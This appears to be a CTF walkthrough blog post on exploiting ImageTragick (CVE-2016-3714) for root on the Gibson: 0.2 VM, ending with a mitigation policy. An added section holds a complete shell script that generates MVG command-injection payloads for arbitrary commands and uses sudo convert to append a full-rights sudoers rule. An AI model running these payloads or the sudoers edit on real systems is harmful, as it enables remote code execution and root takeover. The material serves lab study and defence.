In my Vulnhub walkthrough of Gibson: 0.2, I learned about ImageTragick. ImageTragick is the name given to a set of vulnerabilities in ImageMagick, the best known of which is tracked as CVE-2016-3714. ImageMagick is an image-processing suite commonly used by web applications to resize and convert uploaded images.

ImageMagick hands some formats off to external "delegate" programs (for example, fetching an https:// URL with curl), and it builds the delegate's shell command from the input filename without sanitizing it. A crafted file can therefore inject extra shell commands. If a web server runs ImageMagick on files users upload, that becomes remote code execution: an attacker uploads a file that, when the server processes it, runs a command such as a callback to a listening shell. Note that ImageMagick identifies the format from the file's contents, not its extension, so renaming the payload to .jpg or .png does not stop it being parsed.

The Openwall (oss-security) post explains the technical details of why and how the vulnerability works, so refer to it for the full analysis. In this post, I give a quick example of how it can be used to gain root on Gibson: 0.2. My hope is that seeing this example helps you replicate ImageTragick in your future CTF and pen-testing endeavors.

ImageTragick can be triggered in more than one way. The approach used here is a single crafted input file, carrying the command you want run, passed to convert.

The first thing to understand is that commands injected through this exploit run as the user who invoked ImageMagick. In Gibson 0.2, margo is the user we SSH in as on the target machine, which has a vulnerable ImageMagick installed.

Running id shows that margo is a non-root user.

This time, run id through convert instead, using the crafted file. The output is the same: the command executed as margo, so we are still limited to margo's permissions.

In this particular CTF, margo happens to be allowed to run convert with sudo (sudo -l lists it), which is one of the paths to root the VM was designed with.

Because convert now runs as root, the injected command does too, so you can run any command with root privileges. The quickest route is to give margo full sudo rights by appending the line margo ALL=(ALL:ALL) ALL to /etc/sudoers. Be careful with quoting: a malformed /etc/sudoers breaks sudo for every user on the box.

You can test your success by seeing if you can sudo su to gain root.
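The full chain described above, as an added example that is not part of the original walkthrough. It uses the publicly documented MVG payload for CVE-2016-3714, in which a fill 'url(...)' line breaks out of the https delegate's curl command. The hostname example.com, the base64 wrapping of the injected command, the /tmp file paths and the script's argument handling are this example's own choices; it assumes GNU coreutils and, for the sudo step, a vulnerable convert on the PATH with a sudo rule like margo's.

```shell
#!/bin/sh
# Added example, not from the original post: ImageTragick (CVE-2016-3714)
# payload generation and the sudo-convert root chain from the walkthrough.
# Assumptions: GNU coreutils base64, a vulnerable `convert` on PATH, and a
# sudo rule allowing the current user to run convert (as margo has here).

# Emit an MVG document whose fill url() injects a shell command into the
# https delegate. The delegate command template is roughly
#   "curl" -s -k -o "%o" "https:%M"
# so the double quote inside the filename closes curl's URL argument, and
# the text after the pipe runs as a separate shell command; the trailing
# `echo "x` absorbs the template's closing quote. The command is
# base64-encoded so it may contain quotes, spaces and parentheses that
# would otherwise terminate the url(...) or the surrounding '...' string.
build_mvg_payload() {
    b64=$(printf '%s' "$1" | base64 | tr -d '\n')
    cat <<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|echo $b64|base64 -d|sh;echo "x)'
pop graphic-context
EOF
}

# The privilege-escalation command from the post: append a sudoers rule
# granting the given user unrestricted sudo. A syntax error in
# /etc/sudoers breaks sudo for everyone, which is why visudo normally
# guards that file; keep the quoting exactly as shown.
sudoers_grant_cmd() {
    printf "echo '%s ALL=(ALL:ALL) ALL' >> /etc/sudoers" "$1"
}

# Write the payload and feed it to convert under sudo, so the injected
# command runs as root. convert will usually exit non-zero afterwards
# because the "image" curl fetched is not a real image; the injected
# command has already run by then, so check its side effect, not the
# exit status.
run_via_sudo_convert() {
    payload=/tmp/exploit.mvg
    build_mvg_payload "$1" > "$payload"
    sudo convert "$payload" /tmp/out.png
}

# Usage:
#   sh imagetragick.sh id              # step 1: whoami/id as root
#   sh imagetragick.sh --grant margo   # step 2: add sudoers rule, then `sudo su`
# With no arguments (e.g. when sourced) nothing is executed.
case "${1:-}" in
    "") ;;
    --grant) run_via_sudo_convert "$(sudoers_grant_cmd "${2:-margo}")" ;;
    *) run_via_sudo_convert "$1" ;;
esac
```

Running the first form as margo without sudo shows the injected id output as margo; through sudo convert the same payload prints uid=0, which is the point the walkthrough makes about privilege levels. The base64 wrapper also matters outside this CTF: the original one-line proof of concept only works for commands with no characters the MVG parser treats specially.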

Just like magic 🙂

I encourage you to read up on other ways ImageTragick can be used and how to mitigate it if you employ ImageMagick on your web servers. There is a whole site dedicated to it creatively named https://imagetragick.com/.
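An added example of the mitigation mentioned above, not from the original post: the policy.xml entries that imagetragick.com recommends, which deny the coders the published payloads depend on (the https delegate and the MVG, MSL, URL and EPHEMERAL coders). The path to policy.xml differs by distribution (for example /etc/ImageMagick-6/policy.xml on Debian-based systems), and the list should be checked against the site's current recommendations.

```xml
<policymap>
  <!-- Added example (not the original post's): deny the coders abused by ImageTragick -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
```

Confirm the policy is in effect with convert -list policy, which prints the rules ImageMagick actually loaded. This is defence in depth, not a substitute for upgrading to a fixed ImageMagick release, and because ImageMagick sniffs the format from file contents, a web application should also verify the magic bytes of an upload before passing it to ImageMagick rather than trusting the extension or Content-Type.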

I hope this helps with your future projects. Leave a comment below if you have any questions or inputs.

Thanks for reading and Happy Hacking!

ImageTragick Exploit Example